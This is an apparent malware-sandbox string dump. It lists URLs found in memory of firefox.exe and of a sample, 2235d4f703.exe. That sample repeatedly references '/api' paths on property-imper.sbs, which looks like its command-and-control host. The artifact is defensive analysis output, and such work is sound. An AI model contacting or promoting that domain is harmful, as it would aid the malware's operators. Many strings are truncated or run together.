Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000019.00000002.2972813755.000002348A452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000002.3017099096.000002348A703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2799950747.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000019.00000003.2803157029.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2902363183.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2800424280.00000234956C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000019.00000003.2803157029.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2902363183.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2800424280.00000234956C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000019.00000003.2751068754.000002348D100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2755601551.000002348D37B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754071325.000002348D320000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiments/screenshots/schema.jsononsetup/delayHideC
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/services.sync.lastTabFetch
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/services.sync.lastTabFetchqwantjr
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000002.3045686159.000002348B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000019.00000003.2826959134.00000234959B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000019.00000003.2851793523.000002348D9CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%resource://gre/modules/compone
Source: firefox.exe, 00000019.00000003.2851793523.000002348D959000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.3017099096.000002348A720000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A4C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sMust
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/URIFixup.sys.mjshttp://www.inbox.lv/rf
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.3027734740.000002348AC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sAttempted
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000019.00000002.3045686159.000002348B76D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: 2235d4f703.exe, 00000009.00000003.2629911709.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2690149130.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2692244836.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689623976.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689107439.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684931089.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685083573.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2688197199.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689461786.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685489848.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2691008602.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686690326.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686127655.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686379519.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689292480.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686826837.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684618829.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2657928655.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2738474191.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2691890013.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: 2235d4f703.exe, 00000009.00000003.2629461937.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/3
Source: 2235d4f703.exe, 0000000B.00000003.3002269447.00000000013E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/5
Source: 2235d4f703.exe, 00000009.00000003.2629911709.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2657928655.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2656642315.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629461937.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/7C
Source: 2235d4f703.exe, 00000009.00000003.2629911709.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629461937.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/OC
Source: 2235d4f703.exe, 00000009.00000003.2656642315.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2657928655.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/QQk
Source: 2235d4f703.exe, 0000000B.00000003.2758910159.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2759992832.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/Shsw
Source: 2235d4f703.exe, 00000009.00000003.2793038580.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2715582287.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/WC
Source: 2235d4f703.exe, 0000000B.00000003.2872481294.0000000001409000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2846507995.00000000013FE000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3006270290.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: 2235d4f703.exe, 0000000B.00000003.3009828676.000000000139C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api3
Source: 2235d4f703.exe, 00000009.00000003.2684773955.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684618829.0000000001240000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684409963.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiF
Source: 2235d4f703.exe, 0000000B.00000003.3002813792.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3006270290.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiMIk
Source: 2235d4f703.exe, 00000009.00000003.2656642315.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629911709.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629461937.0000000001223000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apie
Source: 2235d4f703.exe, 00000009.00000003.2688046289.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686826837.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685819613.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687374958.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685489848.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2656642315.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687234574.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687820469.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2715582287.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684931089.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684409963.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2688360776.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685083573.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685660579.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684773955.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687687305.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686379519.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686690326.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687023350.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2657928655.0000000001223000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apirosoft
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2793038580.000000000122C000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2738474191.0000000001223000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apite
Source: 2235d4f703.exe, 00000009.00000003.2859413026.0000000001256000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiv85gj3fO3m
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2738474191.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2793038580.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2715582287.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/psPATHEXT=.COM;.EXE;.BA
